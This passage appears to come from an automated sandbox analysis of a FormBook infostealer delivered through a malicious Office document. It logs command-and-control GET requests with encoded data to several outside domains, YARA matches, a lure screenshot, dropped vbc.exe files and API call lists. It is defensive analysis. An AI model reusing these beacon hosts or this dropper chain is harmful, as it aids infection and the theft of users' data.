        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.aubergetoitrouge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.corpmat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.afishin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.boxtobookshelf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

        E-Banking Fraud:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Screenshot number: 8Screenshot OCR: Enable Editing from the 18 , yellow bar above 19 This document is 20 3 Once you have enabled ed
        Office equation editor drops PE fileShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        .NET source code contains very large stringsShow sources
        Source: vbc[1].exe.4.dr, Forms/mainForm.csLong String: Length: 38272
        Source: vbc.exe.4.dr, Forms/mainForm.csLong String: Length: 38272
        Source: 6.2.vbc.exe.330000.1.unpack, Forms/mainForm.csLong String: Length: 38272
        Source: 6.0.vbc.exe.330000.0.unpack, Forms/mainForm.csLong String: Length: 38272
        Source: 7.0.vbc.exe.330000.0.unpack, Forms/mainForm.csLong String: Length: 38272
        Source: 7.2.vbc.exe.330000.1.unpack, Forms/mainForm.csLong String: Length: 38272
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D009C6_2_001D009C
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D11216_2_001D1121
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D1B006_2_001D1B00
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D3BF86_2_001D3BF8
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D44886_2_001D4488
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D5D506_2_001D5D50
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D4EB16_2_001D4EB1
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D17006_2_001D1700
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D80006_2_001D8000
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D30D16_2_001D30D1
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001DC2106_2_001DC210
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D82906_2_001D8290
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D82806_2_001D8280
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D82CB6_2_001D82CB
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D3B686_2_001D3B68
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D13B06_2_001D13B0
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D6BD06_2_001D6BD0
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D6BC06_2_001D6BC0
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001DAC126_2_001DAC12
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D5C606_2_001D5C60
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D84986_2_001D8498
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D04EA6_2_001D04EA
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D4CE06_2_001D4CE0
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D7D986_2_001D7D98
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D7DA86_2_001D7DA8
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D9E516_2_001D9E51
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001DA7496_2_001DA749
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004010267_2_00401026
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004010307_2_00401030
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C2AE7_2_0041C2AE
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00408C507_2_00408C50
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041BD717_2_0041BD71
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D887_2_00402D88
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D907_2_00402D90
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B6917_2_0041B691
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C7547_2_0041C754
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00402FB07_2_00402FB0
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4E0C67_2_00A4E0C6
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A7D0057_2_00A7D005
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A530407_2_00A53040
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A6905A7_2_00A6905A
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4E2E97_2_00A4E2E9
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AF12387_2_00AF1238
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4F3CF7_2_00A4F3CF
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A763DB7_2_00A763DB
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A523057_2_00A52305
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A9A37B7_2_00A9A37B
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A573537_2_00A57353
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A854857_2_00A85485
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A614897_2_00A61489
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A8D47D7_2_00A8D47D
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A6C5F07_2_00A6C5F0
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5351F7_2_00A5351F
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A546807_2_00A54680
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5E6C17_2_00A5E6C1
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AF26227_2_00AF2622
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5C7BC7_2_00A5C7BC
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AD579A7_2_00AD579A
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A857C37_2_00A857C3
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AEF8EE7_2_00AEF8EE
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A7286D7_2_00A7286D
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5C85C7_2_00A5C85C
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A529B27_2_00A529B2
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AF098E7_2_00AF098E
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A669FE7_2_00A669FE
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AD59557_2_00AD5955
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00B03A837_2_00B03A83
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AFCBA47_2_00AFCBA4
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4FBD77_2_00A4FBD7
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00ADDBDA7_2_00ADDBDA
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A77B007_2_00A77B00
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AEFDDD7_2_00AEFDDD
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A80D3B7_2_00A80D3B
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5CD5B7_2_00A5CD5B
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A82E2F7_2_00A82E2F
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A6EE4C7_2_00A6EE4C
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A60F3F7_2_00A60F3F
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EEE0C69_2_01EEE0C6
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F0905A9_2_01F0905A
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EF30409_2_01EF3040
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F1D0059_2_01F1D005
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EEF3CF9_2_01EEF3CF
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F163DB9_2_01F163DB
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F3A37B9_2_01F3A37B
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EF73539_2_01EF7353
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EF23059_2_01EF2305
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EEE2E99_2_01EEE2E9
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F912389_2_01F91238
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F0C5F09_2_01F0C5F0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EF351F9_2_01EF351F
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F254859_2_01F25485
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F014899_2_01F01489
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EFC7BC9_2_01EFC7BC
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F7579A9_2_01F7579A
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EFE6C19_2_01EFE6C1
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EF46809_2_01EF4680
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F926229_2_01F92622
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F069FE9_2_01F069FE
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EF29B29_2_01EF29B2
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F9098E9_2_01F9098E
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F759559_2_01F75955
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F8F8EE9_2_01F8F8EE
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F1286D9_2_01F1286D
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EFC85C9_2_01EFC85C
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F7DBDA9_2_01F7DBDA
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EEFBD79_2_01EEFBD7
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F9CBA49_2_01F9CBA4
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F17B009_2_01F17B00
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01FA3A839_2_01FA3A83
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F8FDDD9_2_01F8FDDD
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EFCD5B9_2_01EFCD5B
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F20D3B9_2_01F20D3B
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F1DF7C9_2_01F1DF7C
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F00F3F9_2_01F00F3F
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F0EE4C9_2_01F0EE4C
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00088C509_2_00088C50
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00082D889_2_00082D88
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00082D909_2_00082D90
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009C7549_2_0009C754
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00082FB09_2_00082FB0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022667C79_2_022667C7
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022632FF9_2_022632FF
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022633029_2_02263302
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022613629_2_02261362
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022650629_2_02265062
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022608F99_2_022608F9
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022609029_2_02260902
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022675B29_2_022675B2
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01EEDF5C appears 101 times
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F33F92 appears 99 times
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01EEE2A8 appears 38 times
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F3373B appears 237 times
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F5F970 appears 77 times
        Source: C:\Users\Public\vbc.exeCode function: String function: 00A4DF5C appears 104 times
        Source: C:\Users\Public\vbc.exeCode function: String function: 00A9373B appears 238 times
        Source: C:\Users\Public\vbc.exeCode function: String function: 00A93F92 appears 108 times
        Source: C:\Users\Public\vbc.exeCode function: String function: 00ABF970 appears 79 times
        Source: C:\Users\Public\vbc.exeCode function: String function: 00A4E2A8 appears 37 times
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004181B0 NtCreateFile,7_2_004181B0
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00418260 NtReadFile,7_2_00418260
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004182E0 NtClose,7_2_004182E0
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00418390 NtAllocateVirtualMemory,7_2_00418390
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004181B4 NtCreateFile,7_2_004181B4
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041825B NtReadFile,7_2_0041825B
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004182DA NtClose,7_2_004182DA
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A400C4 NtCreateFile,LdrInitializeThunk,7_2_00A400C4
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A40078 NtResumeThread,LdrInitializeThunk,7_2_00A40078
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk,7_2_00A40048
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A407AC NtCreateMutant,LdrInitializeThunk,7_2_00A407AC
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3F9F0 NtClose,LdrInitializeThunk,7_2_00A3F9F0
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3F900 NtReadFile,LdrInitializeThunk,7_2_00A3F900
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_00A3FAE8
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_00A3FAD0
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_00A3FBB8
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_00A3FB68
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk,7_2_00A3FC90
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_00A3FC60
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FD8C NtDelayExecution,LdrInitializeThunk,7_2_00A3FD8C
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_00A3FDC0
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk,7_2_00A3FEA0
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_00A3FED0
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FFB4 NtCreateSection,LdrInitializeThunk,7_2_00A3FFB4
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A410D0 NtOpenProcessToken,7_2_00A410D0
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A40060 NtQuerySection,7_2_00A40060
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A401D4 NtSetValueKey,7_2_00A401D4
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4010C NtOpenDirectoryObject,7_2_00A4010C
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A41148 NtOpenThread,7_2_00A41148
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3F8CC NtWaitForSingleObject,7_2_00A3F8CC
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A41930 NtSetContextThread,7_2_00A41930
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3F938 NtWriteFile,7_2_00A3F938
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FAB8 NtQueryValueKey,7_2_00A3FAB8
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FA20 NtQueryInformationFile,7_2_00A3FA20
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FA50 NtEnumerateValueKey,7_2_00A3FA50
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FBE8 NtQueryVirtualMemory,7_2_00A3FBE8
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FB50 NtCreateKey,7_2_00A3FB50
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FC30 NtOpenProcess,7_2_00A3FC30
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A40C40 NtGetContextThread,7_2_00A40C40
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FC48 NtSetInformationFile,7_2_00A3FC48
